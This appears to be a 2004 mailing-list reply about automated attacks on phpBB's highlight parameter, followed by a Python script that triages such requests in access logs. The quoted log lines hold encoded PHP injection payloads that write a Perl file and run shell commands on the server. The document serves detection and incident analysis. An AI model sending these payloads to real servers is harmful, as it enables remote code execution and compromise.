On Mon, 20 Dec 2004, Shannon Lee wrote:

> After some investigation, we determined that the attacker had gained
> access via phpbb in a series of crafted URL requests, like so:
>
> 64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET /viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE OMITTED.com/

It seems that automated exploiting starts soon after disclosure of the
vulnerability:

62.221.209.145 - - [24/Nov/2004:14:09:05 +0200] "GET /viewtopic.php?t=50674&highlight=%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527 HTTP/1.1" 404 219

Interestingly, we do not use phpbb and in fact do not have viewtopic.php at all.

--
Regards,
ASK
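As an added example, not part of the thread above, here is a small Python log-triage routine for requests like the two quoted. It decodes the highlight= value the way the vulnerable phpBB code did (once by PHP when building $_GET, once more by phpBB's own urldecode(), which is why %2527 arrives as a quote), checks for the quote break-out, and expands the chr() chains so the injected PHP becomes readable. The sample entries are constructed from the two log lines in the thread (the first re-joined from its mail-wrapped fragments, referrer dropped) plus one benign request as a control.

```python
import re
from urllib.parse import unquote

# Constructed sample: the two requests quoted in the thread plus a benign control.
SAMPLE_LOG = [
    '64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET /viewtopic.php?p=9002&sid=f5'
    '399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr(49)'
    '%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),chr(35)'
    '%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(98)'
    '%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)%252echr(108)'
    '%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527 HTTP/1.0"'
    ' 200 13648',
    '62.221.209.145 - - [24/Nov/2004:14:09:05 +0200] "GET /viewtopic.php?t=50674&highlight='
    '%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527 HTTP/1.1" 404 219',
    '192.0.2.7 - - [24/Nov/2004:14:10:00 +0200] "GET /viewtopic.php?t=50674&highlight=phpbb HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (/viewtopic\.php\?\S*) HTTP/\d\.\d"')
CHR_CHAIN_RE = re.compile(r'chr\(\d+\)(?:\.chr\(\d+\))*')

def decode_chr_chains(php):
    """Replace each chr(N).chr(M)... chain with the quoted string it builds."""
    def literal(m):
        text = ''.join(chr(int(n)) for n in re.findall(r'\d+', m.group(0)))
        return '"' + text.replace('\\', '\\\\').replace('"', '\\"').replace('\n', '\\n') + '"'
    return CHR_CHAIN_RE.sub(literal, php)

def injected_php(line):
    """Decode one log line as the vulnerable code did; return the PHP that would
    have run, or None when the request is not a highlight= injection."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    params = dict(p.partition('=')[::2] for p in m.group(1).partition('?')[2].split('&'))
    raw = params.get('highlight')
    if raw is None:
        return None
    once = unquote(raw)     # first decode: PHP populating $_GET
    twice = unquote(once)   # second decode: phpBB's own urldecode() on highlight
    if not (twice.startswith("'.") and twice.endswith(".'")):
        return None         # no quote break-out, so not this injection pattern
    return decode_chr_chains(twice[2:-2])

def scan(lines):
    """Return {client_ip: decoded_payload} for every line that matches."""
    return {l.split(' ', 1)[0]: php for l in lines if (php := injected_php(l))}
```

Run scan() over a full access log to see which hosts sent the pattern and what each payload actually did; the 404 in the second entry is a reminder that the requests arrive whether or not viewtopic.php exists.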